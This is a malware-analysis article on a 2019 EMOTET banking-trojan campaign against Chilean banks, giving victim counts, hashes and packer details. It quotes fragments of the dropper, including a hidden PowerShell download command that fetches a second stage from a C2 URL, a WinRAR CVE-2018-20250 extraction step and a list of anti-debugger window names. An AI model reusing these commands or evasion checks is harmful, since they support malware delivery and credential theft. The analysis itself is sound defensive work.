[SI-LAB] EMOTET spread in Chile impacted hundreds of users and targeted financial and banking services

Pierluigi Paganini April 10, 2019

EMOTET spread in Chile targeted financial and banking services. SI-LAB detected hundreds of users that were impacted by this malware between March 18th and 26th of 2019.

The last days of March 2019 are making headlines due to a targeted cyber attack involving a new variant of infamous EMOTET malware. This threat is known as a banking trojan malware that collects financial information by injecting malicious code into a computer.

EMOTET has evolved in its delivery, however, this wave was conducted with the most prominent form: inserting malicious documents or URL links inside the body of an email sometimes disguised as an invoice or PDF attachment.

According to SI-LAB, a total of 176 users from Chile were affected in a broad cyber threat occurred between March 18th and 26th of 2019. Once again, the main goal of this campaign involving EMOTET had the propose of exfiltrating financial credentials from user’s computers to access financial and banking services geolocated in Chile.

The first phase identified as “__Denuncia_Activa_CL.PDF.bat” is responsible for operating a crucial part of this threat. That file was delivered via malscam campaigns around the world and its source-code is obfuscated in order to evade antivirus detection and complicate its analysis.

Interestingly, the first phase bypasses Virus Total (VT) detentions. With that, criminals achieved an important rule of thumb in the malware landscape: no detection. In fact, an old living of the land technique was used allowing to get fully undetectable (FUD) which is the ultimate goal for malware authors.

The .bat file is a Windows batch script that is responsible for downloading a second script from the Command & Control (C&C) server. The latter leverages the WinRar/Ace vulnerability (CVE-2018-20250) dropping the malware itself into the Windows startup folder. Next, the infected machine will reboot and malware becomes persistent in the system startup.

The high-level workflow this campaign is illustrated below.

emotet-diagram

EMOTET was protected with an extreme commercial packer dubbed Themida. Themida introduced an additional protection layer that made it harder to analyze. Other restrictions were also coded to prevent its execution in different types of scenarios. In this case, for instance, malware authors introduced several anti-run specifications related to victims’ geolocation and language preferences — only Spain/Chile computers were compromised.

Themida packer has a large group of specific features that are very appreciated by criminals to protect their threats. For example, it uses VM-protection techniques, debug-protection, virtual machine emulation, anti-monitors techniques, anti-memory patching (see all Themida features here).

The first alert related to this wave was observed on March 22nd by The Computer Security Certified Response Team (CSIRT), of the Ministry of the Interior from Chile.

“Preliminary information collected allows us to determine that the following URLs and the following IP addresses must be blocked, unless otherwise indicated,” the CSIRT Ministry of the Interior states.

“Based on information obtained from internal sources, the cybersecurity alert situation was identified by an incident related to malicious software called EMOTET affected by the relevant sectors of the economy” – CSIRT Chile.

CSIRT released a comprehensive list of IP addresses that EMOTET signals had to block. A national alert was sent (below) and can be consulted in this URL.

communication

SI-LAB detected that this attack started some days before the alerts were published. Thesecond malware phase (denuncias.rar); which used WinRar/Ace vulnerability (CVE-2018-20250) to drop the malware itself was uploaded by criminals to the opendir C2 server on March 18th, 2019. We can note below, in Technical  Analysis, that the malware was uploaded again later into another web folder on March 21st — maybe an update/change performed by its operators to improve their functionalities or to fix some bug.

emotet-3

As aforementioned, EMOTET only executes inside victim’s computers with Spain/Chile configured as their primary language and this can be an indicator that points to a global target attack.

After several rounds to understand the malware, we found that some Chile financial and banking organizations were targeted, including:

  • BBVAnet
  • Santander
  • CorpBanca
  • Banco Falabella
  • BCI
  • Banco Security
  • Banco Estado
  • Banco de Chile
emotet-4

When the malware is executed without any restrictions, i.e., upon a non-virtualized environment, some information from the victim’s computer is send to C2 server. Data includes date/hour of infectionremote IP from victim’s computer, OS version andantivirus name.

emotet-5

This information was available online on the opendir C2 server and SI-LAB analysed data in order to understand the total of infections and victims impacted this malicious targeted attack.

In detail, we found that 1089 users were impacted by this malware between March 18th and 26th, 2019.

We built a GeoMap of Threats that aggregates the victims’ IP addresses, based on their geolocation, that were collected from all the data in the opendir C2 server. Color intensity is correlated with the number of infections, being the darkest red equivalent to 175 infections in Chile.

GeoMap of Threats

EMOTET Victims of Cyber Threat in Chile

As indicated on the GeoMap of Threats, Chile, USA, Germany and France were the countries with most hits observed by SI-LAB. From a total of 1089 infections, 175 victims were impacted in Chile, 162 in USA, 137 in Germany and 132 in France.

Governmental agency CSIRT and Cybersecurity National System from Chile are currently fighting this growing threat and have been working on increasing awareness among users in the country. They encourage users to stay tuned for their computer security alerts.

For more details and complete analysis of this malicious campaign see the Technical Analysis below.

Technical Analysis


Threat name: __Denuncia_Activa_CL.PDF.bat
MD5: 1e541b14b531bcac70e77a012b0f0f7f
SHA1: 0ca0cd36fb4c9dfeb3e325a01cfb7b75413d1f81
First submission: 2019-03-22 00:39:43


The last weeks of March 2019 were underlined for the bad reasons — a global cyber threat targeted financial institutions and banks from Chile via EMOTET banking trojan malware.

This campaign was conducted via an initial malscan wave adding malicious documents or URL links inside the body of an email sometimes disguised as an invoice or PDF attachment.

According to SI-LAB, 1089 users where impacted by this wave; 176 only in Chile. This malware is not new and, once gain, the main goal was exfiltration of credentials from user’s to access financial and banking services geolocated in Chile.

The first malware phase identified as “__Denuncia_Activa_CL.PDF.bat” is seen as the maestro of all operations strictly well-planed by criminals. This file was delivered via malscam campaigns around the world and its code is obfuscated in order to evade antivirus detection and make harder its analysis. Figure 1 (below) shows the batch script encoded in Little-endian UTF-16.

emotet-6

Figure 1: EMOTET malware obfuscated (encoded in Little-endian UTF-16) — the first phase.

After some rounds was possible to get the malware source-code in ASCII. Let’s look below.

Figure 2: EMOTET malware deobfuscated — the first phase.

In general, the malicious batch script performs the following actions:

1. Generates random name to rename the 2nd stage (dropper)

First, the malware generates a random name to rename the 2nd file downloaded from C2 server (the stage that executes the WinRar/Ace vulnerability — CVE-2018-20250). The latter will drop the EMOTET itself onto the Windows startup folder (discussed later).

In detail, on lines 33, 34 and 35 we can observe that the second stage is download to the victim’s download folder. Next image presents the output generated from the batch file.

emotet-8__

Figure 3: Malware source-code output – the first phase.

2. Drops 2nd stage: PowerShell command is executed to drop the WinRar exploit ‘denuncias.rar’ file.

  1. PowerShell -windowstyle hidden -Command “(New-Object Net.WebClient).DownloadFile(‘%downloadurl%’

The 2nd stage is downloaded from C2 server and is renamed (“25RqcZpQ3.rar”) and placed into “C:\Users\root\Downloads” folder.

emotet-9

Figure 4: Download path – the first phase.

As shown, this file is downloaded from an opendir C2 server. Note that C2 server has available this file in two different directories, namely:

  1. http://www.triosalud[.]cl/wp/wp-content/uploads/2019/02/denuncias.rar
  2. http://www.triosalud[.]cl/wp/wp-content/uploads/2019/03/denuncias.rar (URL hardecoded in 1st stage of malware)
emotet-3
emotet-11

Figure 5: 2nd stage available to download in two different directories.

3. Extracts EMOTET via WinRar: After the 2nd stage download (‘denuncias.rar’), the file is executed and the malware itself (‘Integrity.exe’ – EMOTET) is dropped by WinRar/ACE vulnerability onto Windows startup folder; see lines 38 – 42 in Figure 2.

  1. %ProgramFiles%\WinRAR\winRar.exe” x -y -c “%downloadpath%\%arch%” “%downloadpath%

4. Pings for delay simulation

  1. ping 127.0.0.1 -n 1 > nul

5. Reboot for malware persistence

Once the command shutdown -r is executed the Windows will reboot. This step will create the malware persistence as the EMOTET extracted from 2nd stage places it in Windows startup folder. While a normal reboot by the user would also have the same effect,  for some reason this campaign doesn’t want to wait until the user initiates the reboot.

Upon reboot, the malicious program “Integrity.exe” (EMOTET malware) gets into action and connects to the Command and Control (C&C) server.

Figure 6: Infection graph generated and extracted from Virus Total.

Interestingly, the first phase bypasses Virus Total (VT) detentions. With that, criminals achieved an important rule of thumb in the malware landscape: no detection. In fact, an old living of the land technique was used allowing to get fully undetectable (FUD) which is the ultimate goal for malware authors.

emotet-1

Figure 7: No detection were identified by VT.

2nd stage — The dropper uses the WinRar/ACE vulnerability to distribute EMOTET


Threat name: 25RqcZpQ3.rar / denuncias.rar
MD5: 1e541b14b531bcac70e77a012b0f0f7f
SHA1: 0ca0cd36fb4c9dfeb3e325a01cfb7b75413d1f81
First submission: 2019-03-22 00:39:43


Looking inside the dropper, we can observe interesting artifacts.

emotet-10

Figure 8: Hex code from ‘denuncias.rar’ file — EMOTET dropper.

As shown, the string “C:../AppData\Roaming\Microsoft\Windows\Start.Menu\Programs\Startup\Integrity.exe” is found. In fact, this is the CVE-2018-20250 just saying “hello world, I’m here!” 

In detail, if UAC is running, when you attempt to extract the archive it will fail to place the malware in the “C:\ProgramData” folder due to lack of permissions. This will cause WinRAR to display an error stating “Access is denied” and “operation failed”.

On the other hand, if UAC is disable or WinRAR is run with administrator privileges it will install the malware to the next path:

  1. C:\Users\root\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Integrity.exe

Extracting all the files we can take and analyse the malware itself.

emotet-12

Figure 9: EMOTET malware (‘Integrity.exe”) dropped by 2nd stage.

More details on CVE-2018-20250 here.

EMOTET / Integrity.exe


Threat name: Integrity.exe
MD5: 98172becba685afdd109ac909e3a1085
SHA1: cbb0377ec81d8b120382950953d9069424fb100e
First submission: 2019-03-18 15:10:08


Deeping into the last malware infection stage, we are facing the EMOTET trojan banker — a credential stealer malware that is infecting user’s from Chile in the last months.

At the first glance, the malware is protected with the packer Themida 2.x. This is a terrible notice for malware analysts.

Unpacking Themida, especially the newer versions, is not a small task by any means. Themida uses an extremely complex virtual machine environment combined with every anti-debug and anti-analysis trick in the books, combined with many different obfuscation methods. 

In a Themida binary, different parts of the code are run in virtual machines and it obscures the behavior of the target program. The best method to unpack a VM-protected packer like Themida is to devirtualize it, which involves figuring out the entire instruction set that the packer uses and writing a script to interpret that language. 

Figure 10 shows the binary was developed in Delphi; nonetheless, we will not decompile it because Themida is very hard to unpack and that task is extremely complex.

emotet-13

Figure 10: Packer and compiler detected — Themida 2.x and Delphi.

As we can see below (Figure 11 and 12), and to reinforce the packer presence,  some sections are null name values, and other ones have high entropy (around 8.0). This is a clear signal that we are facing a challenge: Themida packer!

15

Figure 10: EMOTET section entropy.

Figure 11 below illustrates in middle that great part this file is really packed.

emotet-25

Figure 11: Emotet file entropy.

On the one hand, another perfect indicator that Themida is here is the PE file import table (IAT). The IAT is partial destroyed and just a function from kernel32.dll DLL can be observed: lstrcpy.

Figure 12: EMOTET IAT (result from Themida packer).

Dig into the details

Themida packer is, in fact, a constant challenge for malware analysts. The approach that we used to get some inspection from malware file was dump it from memory when it is running. Notwithstanding, remember that just little pieces of code are devirtualized by Themida during its execution. And kept in mind that Themida will detect anti-monitors techniques against file and registry monitors as well.

First, virtual machine need to be tuned as well as the perfect conditions to simulate the infection scenario as real as possible. For this, we need to change the system language preferences to Spain/Chile and adjust some registries in Windows Registry — malware get its values to evade possible detection.

emotet-17

Figure 13: Changes performed in HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\DESCRIPTION\System | SystemBiosDate and VideoBiosVersion registries.

But nothing is perfect. The malware verifies all time the processes are running in the system and terminates if any of them are found (this is a evade technique used by Themida packer and available here). This is one of the many features this modern packer.

  1. indicators = [
  2. “OLLYDBG”,
  3. “GBDYLLO”,
  4. “pediy06”,
  5. “FilemonClass”,
  6. “File Monitor – Sysinternals: www.sysinternals.com”,
  7. “PROCMON_WINDOW_CLASS”,
  8. “Process Monitor – Sysinternals: www.sysinternals.com”,
  9. “RegmonClass”,
  10. “Registry Monitor – Sysinternals: www.sysinternals.com”,
  11. “18467-41”,
  12. ]

Well, backing to EMOTET, and after dumping it from memory, we observed some things such as some DLLs imported and the malware strings.

Just few blocks of EMOTET can be analysed as Themida runs based on a virtual machine environment. Thus, malware functions are devirtualized in real time, and we cannot fix the IAT properly as well.

emotet-18

Figure 14: DLLs imported by EMOTET and anti-VM and anti-dbg techniques detected in this specific memory dump.

After dump it from memory, we need observe that only some DLLs are rebuild. We suspect that other ones continuing hidden. Both Anti-VM and and anti-dbg tecnhiques were again detected after dump the malware. This is not newly! 

However, some info can be extracted from the binary. When it is executed in victim’s computers,  initial info is send to C2 server (a specie of “EHLO” message with some arguments).

Figure 15: EMOTET  C2 server URL.

Information sent includes:

  • Date/hour of infection
  • Victim IP Address
  • Windows OS version
  • Antivirus name

Figure 16 presents a query performed by malware in order to identify the antivirus name running in the infected machine. Winmgmts is a WMI service within the SVCHOST process running under the “LocalSystem” account.

emotet-20

Figure 16: EMOTET collects antivirus product name via WMI query.

The file “up.php” writes all the entries to another file called “tictic.txt“. Every time  that a victim is infected, a EHLO request is send to “up.php” that writes the infection data highlighted above inside this file.

emotet-26

Figure 17: EMOTET C2 files available in a opendir.

Through this file available in an opendir C2 was possible to build an GeoMap of Threats presented at the beginning of the article.

After processing the data we detected that 1089 user’s were infected during this campaign. As pointed out, Chile, USA, Germany and France were the countries with more hits. From a total of 1089, 175 victims were impacted in Chile, 162 in USA, 137 in Germany and 132 in France.

But is important answer this question: What kind of data is collected by this trojan banker? —Banking credentials, of course.

EMOTET drops a sqlite3.dll DLL during its execution in order to use it to get data from sqlite databases from the installed popular web-browsers.

emotet-21
emotet-22

Figure 18: EMOTET collects data from main popular web-browsers.

During static analysis was also possible observe the targeted banks and financial institutions involved in this attack, namely:

  • BBVAnet
  • Santander
  • CorpBanca
  • Banco Falabella
  • BCI
  • Banco Security
  • Banco Estado
  • Banco de Chile
emotet-23

Figure 19: Banks and financial institutions involved in this attack.

Figure 20 (below) shows one of the last administration panels used by EMOTET in its recent infections.

monitor

Figure 20: Administration panel used in recent variants by EMOTET.

Another interesting aspect is the following string observed in past EMOTET infections and hardcoded inside many malware samples.

  1. C:\Projects\Pe indetectavel D2007\comps\TMSv7\AdvEdDD.pas

This is a drag’n’drop interface support file for Delphi 5,6,7,2005,2006 & C++Builder. We could not retrieve any more information about this library in malware.

During this analysis we detect that malware performs several connections to “www.bing.com” — maybe to validate a successful connection to the Internet.

emotet-24

Figure 21: Internet connection is validated during EMOTET execution.

Curious that after several memory dumps we detect some interesting strings are changing in memory. In a specific moment we get the following:

  1. 75EE6DE16BB9D5BE439A3EF523A83AFA
  2. BICE
  3. C852CE43C4D6371C2DA82AD878D20420
  4. 64FF1C0E1F0D0962E878D57DAAF36980E903B51530D0
  5. B2ADBB5BD210030E1B6C82E6524BA740EE6D9E
  6. 2E29C77CA62FA75D8ADC7FB690C8D87B9732E37C97B84983D8CF5F9449ED
  7. BBVA
  8. 50C560964C889B83EF71E713C11243F21DBE6FBE4A85A922
  9. 212DC56494CF022FDC79D7B3B214B971D8123297FD003291CF
  10. D97482A059F06188A526A28681C20823
  11. C650E40229AAF90830A3AD
  12. ITA
  13. CC57EF022BAC2F04297BF728CFF324C360E71EBC6183A5
  14. 8C94A257F056F65CF1205A8AAD918191B71DCA013EDE01
  15. 64F00236E66EFC240866E60A359A
  16. A1A85B9C5CF95BF72775C2A6AE29A75C8297AF20C4788ACC075B83
  17. SANTA
  18. 5DF40FD0084580AA52405E3A3AA221D30A1F37A95287BB1EB42DD1BC43F3053D94
  19. 59F50E2BDC72D5BEA7F50B28D00D4C3BC71CCF759C4AFD57FF171431D91EDB
  20. 64FF34F315499D
  21. B8509C5B8C9E2B00094487BD65E173B198F054A743F007425490BF6394AD44E47CA48587AE4DEE03
  22. AAB671B06FE66981B8EA2B0F17419F548A9FB728DC1022A43F9348252BCB6D95CC
  23. ACB74CEB034053DD01418280A72FA253
  24. CORP
  25. D945F333DA788E49F161F622046DE2023C9E489846
  26. ESTADO
  27. 5FF80F2CC30175A35487D80C6A83D81CC60334A45233FC294485A049F139
  28. 8E89BF7FAE2C42FE3F92C571D71146EF2AAC5E8E4829F6235383BF6E8CF4023C6AFCAB55FB08
  29. BCA75C9BB21066924B9E30DBBD32AB5883C768E41FD065EC78DC
  30. 3FD86F8CA3215583BB2FA05432BB11D5025201538CED60F95CF911C96883
  31. 61FA0926C5077FB962F16590F61D0D053B9E5488B15296
  32. 948FA545E466B551FA295F83AA2EA3
  33. CHILE
  34. 2A23DD01389537D30B19A68282DA798BB3E60E42282AC11FBD14
  35. 50F926C264D2C1599E3E90F464BD30C67CEA1F0E38DCAFC619B56C9C
  36. 8C85A145F565E248C11DBE759C29BA79
  37. BE87512029A426D375DA0FC6A02474E10A4DF5543EE31A0E67F82CD578
  38. 2F28DC1A31928188A723
  39. BCI
  40. 9883B34C36AB2B0061B3CB7DAB27BC6781C1
  41. 64FF36CEA2C015CC0C4984A1534AF640CB18C316CFAEA333AA
  42. FB679F58344B8BB06FE6698E4789C86BC20A6F80AB5BED69BF35D60D
  43. B1AA5996B517041CCD034BF925A02A
  44. SECU
  45. 44DF14D37BD8CB59F65181A74B8ECA7BEE3AD90A32D465B121B8964E7FB543E83FEE4EF826D91EC7789AB12B5E83EE13B563F831CC
  46. FALA
  47. F36F85A24A8B9895BA1545E30F429E57
  48. F41C28DE021050FE2AAD13C6A0CE0431C81FDD
  49. WebPay
  50. 2727D96DF161E9
  51. E9649C5E983093BF6BAB3CEF1B0277B49D3EE66085B685C1074E8CA04E36C264B2698BBD6C8AFD34EF53F36D9A4FFD5383A9FD1725D7134124
  52. ServiPag
  53. F8152FF02BA624CE7A9ACE7AA1
  54. 2932CE659F24BA6287D97AA98F3565F01BBC65E54CDE11B41FBF6F9CBE75B8
  55. SCOTI
  56. A8B67C8CB629BD7AD62EA85D89D77B8BB7

This seems a encrypted strings with specific information about banking systems (maybe, endpoints — we don’t know).

One way to understand the malware totally is devirtualize all entire code. As shown, Themida packer make harder the malware analysis and that was a big challenge during this investigation.

Further details, including Indicators of Compromise (IoCs), are reported in the analysis published by Pedro Tavares.

About the author Pedro Tavares 

Pedro Tavares is a professional in the field of information security working as an Ethical Hacker, Malware Analyst and also a Security Evangelist. He is also a founding member and Pentester at CSIRT.UBI and founder of the security computer blog segurancainformatica.pt.

[adrotate banner=”9″] [adrotate banner=”12″]

Pierluigi Paganini

(SecurityAffairs – EMOTET malware, hacking)

[adrotate banner=”5″]

[adrotate banner=”13″]



you might also like

leave a comment